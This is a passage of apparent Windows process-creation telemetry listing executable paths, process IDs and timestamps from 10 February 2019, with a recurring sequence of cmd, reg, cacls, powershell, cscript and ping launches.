06:28:02.250000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe|0x1ce8|2019-02-10 06:33:53.853000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x770|2019-02-10 06:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xb70|2019-02-10 06:44:47.457000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1f84|2019-02-10 06:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xed8|2019-02-10 06:44:47.490000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x21b4|2019-02-10 06:44:59.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1998|2019-02-10 06:44:59.600000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x2204|2019-02-10 06:45:17.783000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x21b0|2019-02-10 06:45:17.803000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x594|2019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x22b0|2019-02-10 06:45:22.820000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xa2c|2019-02-10 06:45:22.837000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x1a00|2019-02-10 06:45:22.850000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x3c4|2019-02-10 06:45:22.867000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1de4|2019-02-10 06:45:22.897000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2178|2019-02-10 06:45:23.110000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x980|2019-02-10 06:45:23.133000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1fe0|2019-02-10 06:45:23.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1fa4|2019-02-10 06:45:23.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x14ec|2019-02-10 06:45:23.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xcc8|2019-02-10 06:45:23.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xfcc|2019-02-10 06:45:23.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1280|2019-02-10 06:45:23.260000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x6f8|2019-02-10 06:45:23.473000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1a5c|2019-02-10 06:45:23.487000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x8bc|2019-02-10 06:45:23.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x13e4|2019-02-10 06:45:23.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1f60|2019-02-10 06:45:30.647000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x10a4|2019-02-10 06:45:30.673000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x107c|2019-02-10 06:45:32.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2130|2019-02-10 06:45:32.730000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1338|2019-02-10 06:45:48.870000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xc68|2019-02-10 06:45:48.900000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x21d4|2019-02-10 06:45:49.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xa94|2019-02-10 06:45:49.943000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x8f0|2019-02-10 06:46:18.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1c20|2019-02-10 06:46:18.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x10bc|2019-02-10 06:46:47.443000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x12cc|2019-02-10 06:46:47.473000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x13a8|2019-02-10 06:47:03.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xb48|2019-02-10 06:47:03.653000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x23d8|2019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x15fc|2019-02-10 06:47:25.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2298|2019-02-10 06:47:25.847000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1a44|2019-02-10 06:47:25.863000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x21b4|2019-02-10 06:47:47.063000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1928|2019-02-10 06:47:47.080000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xdd8|2019-02-10 06:48:08.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1488|2019-02-10 06:48:08.320000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1fa4|2019-02-10 06:48:29.533000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x850|2019-02-10 06:48:29.587000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1898|2019-02-10 06:48:51.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2120|2019-02-10 06:48:51.720000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x854|2019-02-10 06:49:12.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x91c|2019-02-10 06:49:12.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x22f4|2019-02-10 06:49:34.150000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xb64|2019-02-10 06:49:34.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1a9c|2019-02-10 06:49:55.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x17d0|2019-02-10 06:49:55.377000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x17d8|2019-02-10 06:50:16.557000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xd14|2019-02-10 06:50:16.580000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x128c|2019-02-10 06:50:37.767000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xb04|2019-02-10 06:50:37.800000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x1c20|2019-02-10 06:50:58.953000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1360|2019-02-10 06:50:58.973000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x19f0|2019-02-10 06:51:20.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1db0|2019-02-10 06:51:20.220000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb60|2019-02-10 06:51:41.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x125c|2019-02-10 06:51:41.400000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1590|2019-02-10 06:52:02.617000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x11a8|2019-02-10 06:52:02.650000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1914|2019-02-10 06:52:23.833000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1058|2019-02-10 06:52:23.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1518|2019-02-10 06:52:48.113000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x5a8|2019-02-10 06:52:48.127000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x53c|2019-02-10 06:53:19.340000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1394|2019-02-10 06:53:19.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x838|2019-02-10 06:53:20.400000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x15a8|2019-02-10 07:28:02.247000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1cdc|2019-02-10 08:28:02.253000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe|0x1948|2019-02-10 09:07:02.863000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe|0x634|2019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1e8c|2019-02-10 09:13:15.387000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x181c|2019-02-10 09:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1e68|2019-02-10 09:44:47.263000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2348|2019-02-10 09:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x125c|2019-02-10 09:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1374|2019-02-10 09:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xd58|2019-02-10 09:45:02.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2230|2019-02-10 09:45:02.660000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x13c0|2019-02-10 09:45:21.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x4e0|2019-02-10 09:45:21.843000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x12e0|2019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbd0|2019-02-10 09:45:46.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe58|2019-02-10 09:45:46.153000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x1850|2019-02-10 09:45:46.167000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x23ec|2019-02-10 09:45:46.190000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x16f4|2019-02-10 09:45:46.210000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1b74|2019-02-10 09:45:46.247000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x12d0|2019-02-10 09:45:46.273000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1610|2019-02-10 09:45:46.290000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x648|2019-02-10 09:45:46.313000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x23b8|2019-02-10 09:45:46.323000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xf54|2019-02-10 09:45:46.347000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x20b0|2019-02-10 09:45:46.370000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1dec|2019-02-10 09:45:46.383000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1bbc|2019-02-10 09:45:46.417000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xa24|2019-02-10 09:45:46.430000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x16bc|2019-02-10 09:45:46.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xf80|2019-02-10 09:45:46.500000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xf08|2019-02-10 09:45:48.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xe50|2019-02-10 09:45:48.553000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x490|2019-02-10 09:45:57.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xa58|2019-02-10 09:45:57.657000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1b00|2019-02-10 09:46:15.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x23a4|2019-02-10 09:46:15.843000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1d9c|2019-02-10 09:46:24.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1398|2019-02-10 09:46:24.950000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xb28|2019-02-10 09:46:37.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2164|2019-02-10 09:46:37.080000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1198|2019-02-10 09:46:58.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xd04|2019-02-10 09:46:58.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xce0|2019-02-10 09:46:58.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x3b8|2019-02-10 09:46:58.327000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1f60|2019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x10ac|2019-02-10 09:47:18.497000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xb38|2019-02-10 09:47:18.510000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1480|2019-02-10 09:47:18.533000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xe2c|2019-02-10 09:47:37.713000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1860|2019-02-10 09:47:37.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x2048|2019-02-10 09:47:56.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x128c|2019-02-10 09:47:56.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xed8|2019-02-10 09:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x107c|2019-02-10 09:48:16.877000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x13f8|2019-02-10 09:48:36.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1940|2019-02-10 09:48:36.513000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x212c|2019-02-10 09:48:55.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1f88|2019-02-10 09:48:55.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xbd0|2019-02-10 09:49:15.120000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x438|2019-02-10 09:49:15.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xbd8|2019-02-10 09:49:34.323000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x115c|2019-02-10 09:49:34.340000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x203c|2019-02-10 09:49:53.497000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x21b0|2019-02-10 09:49:53.520000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2328|2019-02-10 09:50:12.667000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1b28|2019-02-10 09:50:12.697000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xfe0|2019-02-10 09:50:31.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x258|2019-02-10 09:50:31.913000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x770|2019-02-10 09:50:51.110000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x84c|2019-02-10 09:50:51.897000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x248|2019-02-10 09:51:11.057000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2018|2019-02-10 09:51:11.070000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xd70|2019-02-10 09:51:30.233000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xccc|2019-02-10 09:51:30.253000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1680|2019-02-10 09:51:49.427000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1260|2019-02-10 09:51:49.493000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x23f8|2019-02-10 09:51:54.560000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1bb4|2019-02-10 09:51:54.577000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xcfc|2019-02-10 09:52:04.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xdd8|2019-02-10 09:52:04.717000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1408|2019-02-10 09:52:29.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1ce8|2019-02-10 10:28:02.243000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1d08|2019-02-10 11:28:02.237000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x1178|2019-02-10 11:46:27.867000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe|0x1dd8|2019-02-10 12:00:00.817000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x10c4|2019-02-10 12:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x8f8|2019-02-10 12:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2018|2019-02-10 12:44:47.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17ec|2019-02-10 12:44:47.453000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x594|2019-02-10 12:44:47.473000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x1f88|2019-02-10 12:45:04.610000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x14d8|2019-02-10 12:45:04.627000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1b28|2019-02-10 12:45:24.803000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xfc0|2019-02-10 12:45:24.827000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xfc8|2019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23a8|2019-02-10 12:45:35.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1680|2019-02-10 12:45:35.893000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x23e8|2019-02-10 12:45:35.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x55c|2019-02-10 12:45:35.923000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xadc|2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x1398|2019-02-10 12:45:36.087000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1750|2019-02-10 12:45:36.113000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x11f0|2019-02-10 12:45:36.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x5ac|2019-02-10 12:45:36.163000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xa90|2019-02-10 12:45:36.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xc4c|2019-02-10 12:45:36.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xb00|2019-02-10 12:45:36.230000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x154c|2019-02-10 12:45:36.257000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xeb0|2019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x960|2019-02-10 12:45:36.440000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x158c|2019-02-10 12:45:36.470000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1be0|2019-02-10 12:45:36.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2dc|2019-02-10 12:45:36.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x221c|2019-02-10 12:45:36.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xc98|2019-02-10 12:46:05.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x248|2019-02-10 12:46:05.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1878|2019-02-10 12:46:22.017000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x84c|2019-02-10 12:46:22.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1898|2019-02-10 12:46:42.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x6c0|2019-02-10 12:46:42.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x125c|2019-02-10 12:46:59.397000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1374|2019-02-10 12:46:59.413000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xf58|2019-02-10 12:47:28.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x67c|2019-02-10 12:47:28.670000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xefc|2019-02-10 12:47:41.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x13d8|2019-02-10 12:47:41.813000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x19e8|2019-02-10 12:47:57.960000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x7fc|2019-02-10 12:47:57.977000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x107c|2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x19f4|2019-02-10 12:48:16.093000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2020|2019-02-10 12:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x918|2019-02-10 12:48:16.123000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xf20|2019-02-10 12:48:33.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1008|2019-02-10 12:48:33.317000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x23ec|2019-02-10 12:48:51.180000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2274|2019-02-10 12:48:51.207000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1f88|2019-02-10 12:49:08.373000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x239c|2019-02-10 12:49:09.170000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1770|2019-02-10 12:49:26.303000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xfc0|2019-02-10 12:49:26.333000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x7f8|2019-02-10 12:49:43.463000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1860|2019-02-10 12:49:43.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1dec|2019-02-10 12:50:00.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xb00|2019-02-10 12:50:00.660000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xeb0|2019-02-10 12:50:17.820000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x158c|2019-02-10 12:50:17.833000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x794|2019-02-10 12:50:35.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x458|2019-02-10 12:50:35.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1b00|2019-02-10 12:50:52.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xb28|2019-02-10 12:50:52.227000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x634|2019-02-10 12:51:09.383000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x16a8|2019-02-10 12:51:09.400000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1e68|2019-02-10 12:51:26.553000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xa98|2019-02-10 12:51:27.350000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x14c8|2019-02-10 12:51:44.527000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x6c0|2019-02-10 12:51:44.540000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x22c0|2019-02-10 12:52:01.710000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2280|2019-02-10 12:52:01.737000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xccc|2019-02-10 12:52:18.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x67c|2019-02-10 12:52:18.950000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x878|2019-02-10 12:52:38.103000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x13d8|2019-02-10 12:52:38.123000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1458|2019-02-10 12:53:00.327000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xa24|2019-02-10 12:53:00.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1cd8|2019-02-10 12:53:16.500000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe|0x1420|2019-02-10 12:59:59.870000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x8f8|2019-02-10 13:28:02.253000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe|0xc5c|2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1f88|2019-02-10 13:55:20.813000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1cd8|2019-02-10 14:28:02.247000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x19d8|2019-02-09 22:55:10.333000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x1e3c|2019-02-10 15:07:12.880000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1a9c|2019-02-10 15:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1260|2019-02-10 15:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x55c|2019-02-10 15:44:47.450000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x115c|2019-02-10 15:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2068|2019-02-10 15:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x11dc|2019-02-10 15:45:07.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x13e4|2019-02-10 15:45:07.653000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1524|2019-02-10 15:45:27.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x17b0|2019-02-10 15:45:27.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x8c4|2019-02-10 15:45:57.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2228|2019-02-10 15:45:58.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1cf0|2019-02-10 15:46:22.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1860|2019-02-10 15:46:22.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1874|2019-02-10 15:46:44.473000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xa90|2019-02-10 15:46:44.503000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x11a8|2019-02-10 15:47:06.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x173c|2019-02-10 15:47:06.750000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1910|2019-02-10 15:47:31.987000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1db4|2019-02-10 15:47:32.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x438|2019-02-10 15:47:45.133000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2018|2019-02-10 15:47:45.153000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x21c8|2019-02-10 15:47:49.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2044|2019-02-10 15:47:49.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x2200|2019-02-10 15:47:49.237000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1124|2019-02-10 15:47:49.253000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xd44|2019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1198|2019-02-10 15:48:04.297000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x135c|2019-02-10 15:48:04.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xd04|2019-02-10 15:48:04.323000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x2364|2019-02-10 15:48:18.437000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1110|2019-02-10 15:48:18.460000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x994|2019-02-10 